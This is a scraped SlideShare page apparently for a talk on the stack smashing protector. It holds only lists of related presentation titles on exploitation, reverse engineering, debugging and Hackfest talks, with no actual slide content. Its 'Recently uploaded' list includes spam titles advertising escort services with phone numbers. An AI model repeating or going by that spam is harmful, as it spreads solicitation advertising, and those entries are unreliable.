NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27Sheng-Hao Ma
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 

Recommended

Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenLex Yu
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練Sheng-Hao Ma
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentKernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentAnne Nicolas
 
Page table manipulation attack
Page table manipulation attackPage table manipulation attack
Page table manipulation attackJungseung Lee 이정승
 
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Miguel Arroyo
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27Sheng-Hao Ma
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
Vhdl practical exam guide
Vhdl practical exam guideVhdl practical exam guide
Vhdl practical exam guideEslam Mohammed
 
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Dosanghwan ahn
 
The true story_of_hello_world
The true story_of_hello_worldThe true story_of_hello_world
The true story_of_hello_worldfantasy zheng
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsSheng-Hao Ma
 
OpenSPARC
OpenSPARCOpenSPARC
OpenSPARCclairbee
 
Predikin and PredikinDB: tools to predict protein kinase peptide specificity
Predikin and PredikinDB: tools to predict protein kinase peptide specificityPredikin and PredikinDB: tools to predict protein kinase peptide specificity
Predikin and PredikinDB: tools to predict protein kinase peptide specificityNeil Saunders
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby SystemsEngine Yard
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging RubyAman Gupta
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Huntingsanghwan ahn
 
Publishing a Perl6 Module
Publishing a Perl6 ModulePublishing a Perl6 Module
Publishing a Perl6 Moduleast_j
 
Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)Ontico
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
The Anatomy of an Exploit
The Anatomy of an ExploitThe Anatomy of an Exploit
The Anatomy of an ExploitPatricia Aas
 
台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報耀德 蔡
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyPriyanka Aash
 
PhD Defence
PhD DefencePhD Defence
PhD Defencedaniele.fronte
 
Codes
CodesCodes
CodesNarayan Loke
 
Linux 系統管理與安全:系統防駭與資訊安全
Linux 系統管理與安全:系統防駭與資訊安全Linux 系統管理與安全:系統防駭與資訊安全
Linux 系統管理與安全:系統防駭與資訊安全維泰 蔡
 
ch6-pv2-device-drivers
ch6-pv2-device-driversch6-pv2-device-drivers
ch6-pv2-device-driversyushiang fu
 
Kernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering OopsiesKernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering OopsiesAnne Nicolas
 
Introduction to gdb
Introduction to gdbIntroduction to gdb
Introduction to gdbOwen Hsu
 

More Related Content

What's hot

Vhdl practical exam guide
Vhdl practical exam guideVhdl practical exam guide
Vhdl practical exam guideEslam Mohammed
 
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Dosanghwan ahn
 
The true story_of_hello_world
The true story_of_hello_worldThe true story_of_hello_world
The true story_of_hello_worldfantasy zheng
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsSheng-Hao Ma
 
Predikin and PredikinDB: tools to predict protein kinase peptide specificity
Predikin and PredikinDB: tools to predict protein kinase peptide specificityPredikin and PredikinDB: tools to predict protein kinase peptide specificity
Predikin and PredikinDB: tools to predict protein kinase peptide specificityNeil Saunders
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby SystemsEngine Yard
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging RubyAman Gupta
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Huntingsanghwan ahn
 
Publishing a Perl6 Module
Publishing a Perl6 ModulePublishing a Perl6 Module
Publishing a Perl6 Moduleast_j
 
Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)Ontico
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
The Anatomy of an Exploit
The Anatomy of an ExploitThe Anatomy of an Exploit
The Anatomy of an ExploitPatricia Aas
 
台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報耀德 蔡
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyPriyanka Aash
 
Linux 系統管理與安全:系統防駭與資訊安全
Linux 系統管理與安全:系統防駭與資訊安全Linux 系統管理與安全:系統防駭與資訊安全
Linux 系統管理與安全:系統防駭與資訊安全維泰 蔡
 
ch6-pv2-device-drivers
ch6-pv2-device-driversch6-pv2-device-drivers
ch6-pv2-device-driversyushiang fu
 

What's hot (20)

Vhdl practical exam guide
Vhdl practical exam guideVhdl practical exam guide
Vhdl practical exam guide
 
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Do
 
The true story_of_hello_world
The true story_of_hello_worldThe true story_of_hello_world
The true story_of_hello_world
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
 
OpenSPARC
OpenSPARCOpenSPARC
OpenSPARC
 
Predikin and PredikinDB: tools to predict protein kinase peptide specificity
Predikin and PredikinDB: tools to predict protein kinase peptide specificityPredikin and PredikinDB: tools to predict protein kinase peptide specificity
Predikin and PredikinDB: tools to predict protein kinase peptide specificity
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
 
Publishing a Perl6 Module
Publishing a Perl6 ModulePublishing a Perl6 Module
Publishing a Perl6 Module
 
Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
The Anatomy of an Exploit
The Anatomy of an ExploitThe Anatomy of an Exploit
The Anatomy of an Exploit
 
台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
 
PhD Defence
PhD DefencePhD Defence
PhD Defence
 
Codes
CodesCodes
Codes
 
Linux 系統管理與安全:系統防駭與資訊安全
Linux 系統管理與安全:系統防駭與資訊安全Linux 系統管理與安全:系統防駭與資訊安全
Linux 系統管理與安全:系統防駭與資訊安全
 
ch6-pv2-device-drivers
ch6-pv2-device-driversch6-pv2-device-drivers
ch6-pv2-device-drivers
 

Similar to Stack Smashing Protector (Paul Rascagneres)

Kernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering OopsiesKernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering OopsiesAnne Nicolas
 
Introduction to gdb
Introduction to gdbIntroduction to gdb
Introduction to gdbOwen Hsu
 
week5_giveup_pwn.pdf
week5_giveup_pwn.pdfweek5_giveup_pwn.pdf
week5_giveup_pwn.pdfssuser83af16
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
Аварийный дамп – чёрный ящик упавшей JVM. Андрей Паньгин
Аварийный дамп – чёрный ящик упавшей JVM. Андрей ПаньгинАварийный дамп – чёрный ящик упавшей JVM. Андрей Паньгин
Аварийный дамп – чёрный ящик упавшей JVM. Андрей Паньгинodnoklassniki.ru
 
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...Faisal Akber
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
プログラム実行の話と
OSとメモリの挙動の話
プログラム実行の話と
OSとメモリの挙動の話プログラム実行の話と
OSとメモリの挙動の話
プログラム実行の話と
OSとメモリの挙動の話tatsunori ishikawa
 
HackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainHackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainSaumil Shah
 
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]RootedCON
 
03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old days03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old daysAlexandre Moneger
 
在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群maclean liu
 
Secrets of building a debuggable runtime: Learn how language implementors sol...
Secrets of building a debuggable runtime: Learn how language implementors sol...Secrets of building a debuggable runtime: Learn how language implementors sol...
Secrets of building a debuggable runtime: Learn how language implementors sol...Dev_Events
 
Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64FFRI, Inc.
 
Scylla core dump debugging tools
Scylla core dump debugging toolsScylla core dump debugging tools
Scylla core dump debugging toolsTomasz Grabiec
 
The n00bs guide to ovs dpdk
The n00bs guide to ovs dpdkThe n00bs guide to ovs dpdk
The n00bs guide to ovs dpdkmarkdgray
 
Linux Kernel Crashdump
Linux Kernel CrashdumpLinux Kernel Crashdump
Linux Kernel CrashdumpMarian Marinov
 

Similar to Stack Smashing Protector (Paul Rascagneres) (20)

Kernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering OopsiesKernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering Oopsies
 
Introduction to gdb
Introduction to gdbIntroduction to gdb
Introduction to gdb
 
week5_giveup_pwn.pdf
week5_giveup_pwn.pdfweek5_giveup_pwn.pdf
week5_giveup_pwn.pdf
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
 
Аварийный дамп – чёрный ящик упавшей JVM. Андрей Паньгин
Аварийный дамп – чёрный ящик упавшей JVM. Андрей ПаньгинАварийный дамп – чёрный ящик упавшей JVM. Андрей Паньгин
Аварийный дамп – чёрный ящик упавшей JVM. Андрей Паньгин
 
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Writing bios
Writing biosWriting bios
Writing bios
 
プログラム実行の話と
OSとメモリの挙動の話
プログラム実行の話と
OSとメモリの挙動の話プログラム実行の話と
OSとメモリの挙動の話
プログラム実行の話と
OSとメモリの挙動の話
 
HackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainHackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great Again
 
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
 
03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old days03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old days
 
Basic Linux kernel
Basic Linux kernelBasic Linux kernel
Basic Linux kernel
 
在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群
 
Secrets of building a debuggable runtime: Learn how language implementors sol...
Secrets of building a debuggable runtime: Learn how language implementors sol...Secrets of building a debuggable runtime: Learn how language implementors sol...
Secrets of building a debuggable runtime: Learn how language implementors sol...
 
Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64
 
Scylla core dump debugging tools
Scylla core dump debugging toolsScylla core dump debugging tools
Scylla core dump debugging tools
 
Containers for sysadmins
Containers for sysadminsContainers for sysadmins
Containers for sysadmins
 
The n00bs guide to ovs dpdk
The n00bs guide to ovs dpdkThe n00bs guide to ovs dpdk
The n00bs guide to ovs dpdk
 
Linux Kernel Crashdump
Linux Kernel CrashdumpLinux Kernel Crashdump
Linux Kernel Crashdump
 

More from Hackfest Communication

Du fuzzing dans les tests d'intrusions? (Éric Gingras)
Du fuzzing dans les tests d'intrusions? (Éric Gingras)Du fuzzing dans les tests d'intrusions? (Éric Gingras)
Du fuzzing dans les tests d'intrusions? (Éric Gingras)Hackfest Communication
 
Quelles lois sont applicables au hacker? Énormément moins que tu penses. (Bot...
Quelles lois sont applicables au hacker? Énormément moins que tu penses. (Bot...Quelles lois sont applicables au hacker? Énormément moins que tu penses. (Bot...
Quelles lois sont applicables au hacker? Énormément moins que tu penses. (Bot...Hackfest Communication
 
Conservation et la circulation des renseignements personnels des services de ...
Conservation et la circulation des renseignements personnels des services de ...Conservation et la circulation des renseignements personnels des services de ...
Conservation et la circulation des renseignements personnels des services de ...Hackfest Communication
 
Mots de passe et mécanismes d’authentification (Thomas Pornin)
Mots de passe et mécanismes d’authentification (Thomas Pornin)Mots de passe et mécanismes d’authentification (Thomas Pornin)
Mots de passe et mécanismes d’authentification (Thomas Pornin)Hackfest Communication
 
Comment détecter des virus inconnus en utilisant des « honey pots » et d’autr...
Comment détecter des virus inconnus en utilisant des « honey pots » et d’autr...Comment détecter des virus inconnus en utilisant des « honey pots » et d’autr...
Comment détecter des virus inconnus en utilisant des « honey pots » et d’autr...Hackfest Communication
 
Comment détecter des virus inconnus en utilisant des « Honeypots » et d’autre...
Comment détecter des virus inconnus en utilisant des « Honeypots » et d’autre...Comment détecter des virus inconnus en utilisant des « Honeypots » et d’autre...
Comment détecter des virus inconnus en utilisant des « Honeypots » et d’autre...Hackfest Communication
 
PostNet, une nouvelle ère de Botnet résilient (Julien Desfossez & David Goulet)
PostNet, une nouvelle ère de Botnet résilient (Julien Desfossez & David Goulet)PostNet, une nouvelle ère de Botnet résilient (Julien Desfossez & David Goulet)
PostNet, une nouvelle ère de Botnet résilient (Julien Desfossez & David Goulet)Hackfest Communication
 
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)Hackfest Communication
 
Responsabilisation des données confidentielles en entreprise (Étienne Dubreuil)
Responsabilisation des données confidentielles en entreprise (Étienne Dubreuil)Responsabilisation des données confidentielles en entreprise (Étienne Dubreuil)
Responsabilisation des données confidentielles en entreprise (Étienne Dubreuil)Hackfest Communication
 
Le GPU à la rescousse du CPU (Charles Demers-Tremblay)
Le GPU à la rescousse du CPU (Charles Demers-Tremblay)Le GPU à la rescousse du CPU (Charles Demers-Tremblay)
Le GPU à la rescousse du CPU (Charles Demers-Tremblay)Hackfest Communication
 
802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)
802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)
802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)Hackfest Communication
 

More from Hackfest Communication (14)

Hackerspace jan-2013
Hackerspace jan-2013Hackerspace jan-2013
Hackerspace jan-2013
 
Hackfest @ WAQ2011
Hackfest @ WAQ2011Hackfest @ WAQ2011
Hackfest @ WAQ2011
 
Du fuzzing dans les tests d'intrusions? (Éric Gingras)
Du fuzzing dans les tests d'intrusions? (Éric Gingras)Du fuzzing dans les tests d'intrusions? (Éric Gingras)
Du fuzzing dans les tests d'intrusions? (Éric Gingras)
 
Quelles lois sont applicables au hacker? Énormément moins que tu penses. (Bot...
Quelles lois sont applicables au hacker? Énormément moins que tu penses. (Bot...Quelles lois sont applicables au hacker? Énormément moins que tu penses. (Bot...
Quelles lois sont applicables au hacker? Énormément moins que tu penses. (Bot...
 
Broken by design (Danny Fullerton)
Broken by design (Danny Fullerton)Broken by design (Danny Fullerton)
Broken by design (Danny Fullerton)
 
Conservation et la circulation des renseignements personnels des services de ...
Conservation et la circulation des renseignements personnels des services de ...Conservation et la circulation des renseignements personnels des services de ...
Conservation et la circulation des renseignements personnels des services de ...
 
Mots de passe et mécanismes d’authentification (Thomas Pornin)
Mots de passe et mécanismes d’authentification (Thomas Pornin)Mots de passe et mécanismes d’authentification (Thomas Pornin)
Mots de passe et mécanismes d’authentification (Thomas Pornin)
 
Comment détecter des virus inconnus en utilisant des « honey pots » et d’autr...
Comment détecter des virus inconnus en utilisant des « honey pots » et d’autr...Comment détecter des virus inconnus en utilisant des « honey pots » et d’autr...
Comment détecter des virus inconnus en utilisant des « honey pots » et d’autr...
 
Comment détecter des virus inconnus en utilisant des « Honeypots » et d’autre...
Comment détecter des virus inconnus en utilisant des « Honeypots » et d’autre...Comment détecter des virus inconnus en utilisant des « Honeypots » et d’autre...
Comment détecter des virus inconnus en utilisant des « Honeypots » et d’autre...
 
PostNet, une nouvelle ère de Botnet résilient (Julien Desfossez & David Goulet)
PostNet, une nouvelle ère de Botnet résilient (Julien Desfossez & David Goulet)PostNet, une nouvelle ère de Botnet résilient (Julien Desfossez & David Goulet)
PostNet, une nouvelle ère de Botnet résilient (Julien Desfossez & David Goulet)
 
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)
 
Responsabilisation des données confidentielles en entreprise (Étienne Dubreuil)
Responsabilisation des données confidentielles en entreprise (Étienne Dubreuil)Responsabilisation des données confidentielles en entreprise (Étienne Dubreuil)
Responsabilisation des données confidentielles en entreprise (Étienne Dubreuil)
 
Le GPU à la rescousse du CPU (Charles Demers-Tremblay)
Le GPU à la rescousse du CPU (Charles Demers-Tremblay)Le GPU à la rescousse du CPU (Charles Demers-Tremblay)
Le GPU à la rescousse du CPU (Charles Demers-Tremblay)
 
802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)
802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)
802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)
 

Recently uploaded

Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 

Recently uploaded (20)

Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
